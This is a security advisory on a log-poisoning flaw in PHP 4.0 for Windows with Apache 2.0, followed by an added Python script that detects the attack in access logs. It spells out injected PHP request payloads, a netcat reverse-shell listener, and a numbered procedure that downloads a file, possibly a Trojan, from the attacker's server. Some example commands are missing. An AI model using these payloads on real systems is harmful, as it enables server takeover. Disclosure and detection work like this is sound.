A major security vulnerability has been found in PHP for Windows. Because php.exe can be made to parse files that reside outside the normal HTML root directory, an attacker can execute arbitrary code by inserting a malicious PHP command into the Apache log file and then having php.exe parse that log.
Credit:
The information has been provided by Paul Brereton.
Vulnerable systems:
PHP version 4.0 with Apache Server version 2.0
Exploit (Executing a command):
Assume that a user has installed Apache in the location "c:\apache" and that php.exe was installed in the default path of "c:\php\php.exe". The exploit steps to gain root are as follows:
Apache will then add this request line to the access.log file. By requesting the log file through php.exe you can then run the PHP system code like this:
Root is gained by getting the web server to make a reverse telnet connection back to your server, which is running netcat with a command such as:
"nc -l -n -v -p "
As you can see, this is a very simple way to compromise the entire server with the php.exe exploit.
Exploit (Uploading a file):
1) Create a text file on your webserver called mytestfile.txt
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing http://[YOUR_SERVER_IP]/mytestfile.txt
5) Check that the file exists on the server by typing http://www.example.com/mytestfile.txt into your browser.
6) You now have to make 4 requests. (If the browser does not seem to connect, do not worry: it is connecting. Do not press Refresh at any step, otherwise this will not work. Remember to replace the bracketed placeholders in the first two requests.)
7) Make the request in your browser http://www.example.com/<?$fp=fopen("http://[YOUR_SERVER_IP]/mytestfile.txt","rb");?>
8) Wait for about 10 Seconds
9) Make the request in your browser http://www.example.com/<?$contents=fread($fp,[REPLACE_WITH_THE_SIZE_OF_YOUR_FILE]);?>
10) Wait for about 10 Seconds
11) Make the request in your browser http://www.example.com/<?$fq=fopen("c:/Apache2/htdocs/mytestfile.txt","wb");?>
12) Wait for about 10 Seconds
13) Make the request in your browser http://www.example.com/<?fwrite($fq,$contents);?>
14) Wait for about 10 Seconds
15) Make a request for a non-existent file (to flush the access log) by typing http://www.example.com/nonexistantfile.htm
16) Wait for about 10 seconds
17) Get php.exe to parse the apache logfile by typing http://www.example.com/php/php.exe?c:\apache2\logs\access.log
18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on server by typing in your browser http://www.example.com/mytestfile.txt
What happens is that php.exe runs the PHP code that has been logged in the Apache log file. The code in the log file then tells the server to download the file from your server and save it into the Apache directory.
The uploaded file can be a Trojan, an exe file, a PHP file, etc. There is no limitation on what you can upload or where.
It is a very simple task to write a Trojan with CGI headers and to execute it once uploaded.
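As an added defensive example (not part of the advisory), the following Python script parses Apache Common Log Format lines and flags the two traces this technique leaves in access.log: a request line carrying a PHP open tag, and a request that hands php.exe a path to the log file. The sample log lines, hosts and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache Common Log Format; the request field may hold escaped quotes (\")
# because Apache writes the raw request line, quotes and all.
CLF_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+)')
PHP_TAG_RE = re.compile(r'<\?|<%|<script\s+language\s*=\s*["\']?php', re.I)
PHP_EXE_RE = re.compile(r'php\.exe\?(?P<arg>[^\s&]*)', re.I)
LOG_PATH_RE = re.compile(r'[\\/]logs[\\/]|\.log$', re.I)

# Constructed sample lines (not from the advisory); documentation IPs only.
SAMPLE_LOG_LINES = [
    r'192.0.2.10 - - [12/Jun/2002:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043',
    r'192.0.2.10 - - [12/Jun/2002:10:01:09 +0000] "GET /<?$fp=fopen(\"http://192.0.2.10/t.txt\",\"rb\");?> HTTP/1.1" 404 287',
    r'192.0.2.10 - - [12/Jun/2002:10:02:15 +0000] "GET /php/php.exe?c:\apache2\logs\access.log HTTP/1.1" 200 9182',
    r'198.51.100.7 - - [12/Jun/2002:10:03:00 +0000] "GET /docs/guide.php?page=intro HTTP/1.1" 200 2210',
]

def parse_clf_line(line):
    """Return the CLF fields as a dict, or None if the line does not parse."""
    m = CLF_RE.match(line.rstrip("\n"))
    if not m:
        return None
    fields = m.groupdict()
    fields["request"] = fields["request"].replace('\\"', '"')  # undo Apache's escaping
    return fields

def classify_request(request):
    """List the reasons a logged request looks like log poisoning, if any."""
    decoded = unquote(request)  # %3C%3F must be seen as <?
    reasons = []
    if PHP_TAG_RE.search(decoded):
        reasons.append("php_tag_in_request")  # PHP code written into the log
    m = PHP_EXE_RE.search(decoded)
    if m:
        reasons.append("php_exe_file_argument")  # interpreter asked to parse a file
        if LOG_PATH_RE.search(m.group("arg")):
            reasons.append("log_file_argument")  # ...and that file is a log
    return reasons

def scan_access_log(lines):
    """Parse CLF lines and return a finding for every suspicious request."""
    findings = []
    for fields in filter(None, map(parse_clf_line, lines)):
        reasons = classify_request(fields["request"])
        if reasons:
            findings.append({"host": fields["host"], "time": fields["time"],
                             "request": fields["request"], "reasons": reasons})
    return findings
```

Both signatures from one host within a short window is exactly the sequence the advisory walks through, so a hit on the second signature alone (php.exe pointed at the logs directory) is worth alerting on by itself.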